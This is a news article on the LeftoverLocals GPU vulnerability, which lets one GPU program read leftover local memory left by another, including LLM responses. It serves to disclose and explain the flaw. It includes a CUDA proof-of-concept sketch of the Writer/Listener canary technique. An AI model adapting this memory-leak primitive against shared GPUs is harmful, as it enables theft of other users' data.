It’s fairly common for vulnerabilities to emerge in hardware components, and they tend to affect a large number of people across the technology industry. A recent example is Intel’s Downfall vulnerability, which put a vast number of the company’s CPU users at risk. This time, however, GPU users should be wary, regardless of platform, be it mobile or desktop. Security firm Trail of Bits has discovered a vulnerability that can extract “key data” from a GPU’s local memory.

The vulnerability, dubbed “LeftoverLocals,” does not target consumer applications directly; instead, it targets the GPUs used to run large language models (LLMs) and machine learning (ML) frameworks. Data extraction is particularly serious in this area, since training and serving such models involves sensitive data. The CERT Coordination Center at Carnegie Mellon University is tracking the disclosure of LeftoverLocals, and the information has reportedly already been shared with major GPU vendors such as NVIDIA, Apple, AMD, Arm, Intel, Qualcomm and Imagination.
It was found that, when running a model with seven billion parameters, LeftoverLocals can leak about 5.5 MB of data per GPU invocation on AMD’s Radeon RX 7900 XT. According to Trail of Bits, accumulated over the many invocations of a single query, this leakage is sufficient to reconstruct an LLM’s responses with high precision. The vulnerability therefore poses a significant risk in the field of artificial intelligence, especially for companies that train or serve LLMs. Attackers could potentially piggyback on others’ advances in AI, amplifying their reach far beyond their own resources.
LeftoverLocals stems from how a GPU isolates its memory, which differs fundamentally from the memory isolation enforced on a CPU. An attacker with shared access to a GPU through a programmable interface can read leftover data from its local memory, which opens the door to a range of security issues. The attack is built from two cooperating programs, a Listener and a Writer, which work as follows:
Overall, the vulnerability can be illustrated with two simple programs. The Writer repeatedly launches a GPU kernel that stores canary values in local memory, while the Listener repeatedly launches a kernel that reads uninitialized local memory and checks it for those canaries. If the canary values show up in the Listener’s output, data written by one kernel has survived into another, proof that the GPU is leaking local memory across isolation boundaries.
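For illustration only, here is a minimal sketch of that canary pattern written in CUDA. Note that Trail of Bits’ actual proof of concept targets OpenCL, Vulkan, and Metal rather than CUDA, that NVIDIA GPUs were reportedly not found vulnerable, and that the buffer size, kernel names, and launch parameters below are assumptions made for the sketch. In the real attack, Listener and Writer also run as separate co-resident processes sharing the GPU; this sketch keeps them in one program for brevity.

```cuda
#include <cstdio>
#include <cuda_runtime.h>

// Illustrative size of the local (shared) memory region each kernel touches.
// The real attack sweeps the maximum region available per workgroup.
constexpr int LOCAL_WORDS = 1024;
constexpr unsigned CANARY = 0xDEADBEEFu;

// Writer: fills local memory with a known canary pattern and exits without
// clearing it. On a vulnerable GPU, the values persist in the on-chip SRAM.
__global__ void writer(unsigned *sink) {
    __shared__ unsigned scratch[LOCAL_WORDS];
    for (int i = threadIdx.x; i < LOCAL_WORDS; i += blockDim.x)
        scratch[i] = CANARY;
    __syncthreads();
    // Keep one live read of scratch so the compiler cannot drop the stores.
    if (threadIdx.x == 0) *sink = scratch[0];
}

// Listener: declares the same region but never writes to it, then copies
// whatever stale contents it finds out to global memory for inspection.
__global__ void listener(unsigned *out) {
    __shared__ unsigned scratch[LOCAL_WORDS];  // deliberately uninitialized
    for (int i = threadIdx.x; i < LOCAL_WORDS; i += blockDim.x)
        out[i] = scratch[i];
}

int main() {
    unsigned *out, *sink;
    cudaMallocManaged(&out, LOCAL_WORDS * sizeof(unsigned));
    cudaMallocManaged(&sink, sizeof(unsigned));

    writer<<<1, 256>>>(sink);   // plant canaries in local memory
    cudaDeviceSynchronize();

    listener<<<1, 256>>>(out);  // read back uninitialized local memory
    cudaDeviceSynchronize();

    // Count how many canaries survived from one kernel into the next.
    int hits = 0;
    for (int i = 0; i < LOCAL_WORDS; ++i)
        if (out[i] == CANARY) ++hits;
    printf("canary hits: %d / %d\n", hits, LOCAL_WORDS);

    cudaFree(out);
    cudaFree(sink);
    return 0;
}
```

On a vulnerable GPU, the hit count would be nonzero because the hardware reuses the same on-chip local memory without clearing it between kernels; on a patched or unaffected GPU, the Listener should only ever see cleared memory.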
The average consumer probably doesn’t need to worry about LeftoverLocals. For professionals in areas such as cloud computing or ML inference, however, the vulnerability could be severe, particularly where the confidentiality of LLMs and ML frameworks is concerned.
Source: Trail of Bits